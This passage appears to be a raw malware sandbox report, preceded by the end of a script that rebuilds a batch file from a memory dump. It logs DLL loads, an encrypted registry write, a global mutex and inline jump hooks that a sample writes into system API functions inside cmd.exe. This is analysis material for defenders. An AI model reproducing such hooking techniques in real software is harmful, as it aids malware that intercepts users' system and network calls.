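    for n in notes:
        print("note:", n)
```

Run as a script it prints the five-line batch file (206 bytes) and one note about the 39 unconfirmed trailing bytes of the last read. The same overlap check is what catches a truncated or mis-ordered dump when this is pointed at another report.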
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 2A0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 2C0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 310000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 360000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 360000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 360000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 77F10000 299008 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 370000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 4B0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 4B0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 4C0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 9A0000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 9A0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 470000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 470000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 470000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 9A0000 618496 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat query and read commit C70000 4096 own pid readonly success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 9A0000 618496 own pid readonly object name not found 1 154844
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 154844
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 154844
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 154844
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 154844
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 154844
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 154844
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 154844
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 154844
\KnownDlls\Normaliz.dll write and read and execute unknown 9A0000 36864 own pid read write conflicting addresses 1 154844
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 154844
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 154844
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 154844
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 154844
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 159F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 159FC6
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 159F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 159F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid DisableUNCCheck object name not found 2 4AD04A2A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid EnableExtensions success or wait 2 4AD04A4F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid DelayedExpansion object name not found 2 4AD04A88
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid DefaultColor success or wait 2 4AD04AAD
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid CompletionChar success or wait 1 4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid PathCompletionChar success or wait 1 4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid AutoRun success or wait 1 4AD04BB8
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid CompletionChar success or wait 1 4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid PathCompletionChar object name not found 1 4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid AutoRun object name not found 1 4AD04BB8
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1 14C0F6
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E41AF7F 30 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1 15A4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
2536 C:\WINDOWS\system32\cmd.exe C50000 10 B8 35 00 00 00 E9 A9 D1 CB 7B success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 5 E9 33 B7 83 83 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5000A 10 68 6C 02 00 00 E9 1E 63 CC 7B success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 5 E9 94 27 83 83 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50014 10 8B FF 55 8B EC E9 7C 11 BC 7B success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C811195 5 E9 CE 79 93 83 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5001E 10 8B FF 55 8B EC E9 9B FA CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 5 E9 97 45 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50028 10 8B FF 55 8B EC E9 5C EE D0 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D95EE89 5 E9 20 52 7F C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50032 10 8B FF 55 8B EC E9 88 A6 D6 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D9BA6BF 5 E9 3E 9A 79 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5003C 10 8B FF 55 8B EC E9 25 A6 D6 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D9BA666 5 E9 33 9B 79 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50046 10 8B FF 55 8B EC E9 3D 90 CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D949088 5 E9 AD B1 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50050 10 8B FF 55 8B EC E9 F6 64 CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94654B 5 E9 2D DD 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5005A 10 8B FF 55 8B EC E9 22 33 D1 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D963381 5 E9 36 0F 7F C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50064 10 8B FF 55 8B EC E9 1A BF CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94BF83 5 E9 7E 83 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5006E 10 8B FF 55 8B EC E9 1A 87 CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94878D 5 E9 A0 BB 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50078 10 8B FF 55 8B EC E9 AE 3D E6 70 success or wait 1 15A569
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
2536 C:\WINDOWS\system32\cmd.exe BD0000 13F6B0 page read and write success or wait 1 154961
2536 C:\WINDOWS\system32\cmd.exe BD0000 13F6B4 page read and write success or wait 1 154961
2536 C:\WINDOWS\system32\cmd.exe C50000 13F484 page execute and read and write success or wait 1 151A36
2536 C:\WINDOWS\system32\cmd.exe C60000 13FE10 page read and write success or wait 1 4AD04578
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C50000 1000 page execute and read and write page execute and read and write success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe C50000 1000 page execute and read and write page execute and read and write success or wait 52 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 15A5AD
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C5000A 1000 page execute and read and write page execute and read and write success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 15A5AD
2536 C:\WINDOWS\system32\cmd.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C50014 1000 page execute and read and write page execute and read and write success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 15A5AD
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C5001E 1000 page execute and read and write page execute and read and write success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 15A5AD
2536 C:\WINDOWS\system32\cmd.exe 3D95EE89 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C50028 1000 page execute and read and write page execute and read and write success or wait 1 15A569
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2003759249
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2003774672
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 2A0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2003785576
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 2C0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2003791683
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 310000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2003793476
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 360000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2003795033
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 360000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2003799457
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 360000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2003799611
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2003809456
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2003818739
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2003826713
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 2003845133
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2003850423
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 370000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2003857708
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 4B0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2003876399
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 4B0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2003879747
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2003882850
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2003890795
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2003897777
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2003906841
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2003923585
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2003925433
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2003942985
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2003972505
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2004000575
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2004006415
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2004008551
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2004009624
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2004012042
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2004015685
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2004017761
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2004018367
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 4C0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2004021781
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 440000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2004028178
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 440000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2004029104
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2004029988
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 9A0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2004105954
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 9A0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2004128523
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2004132661
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 470000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2004170319
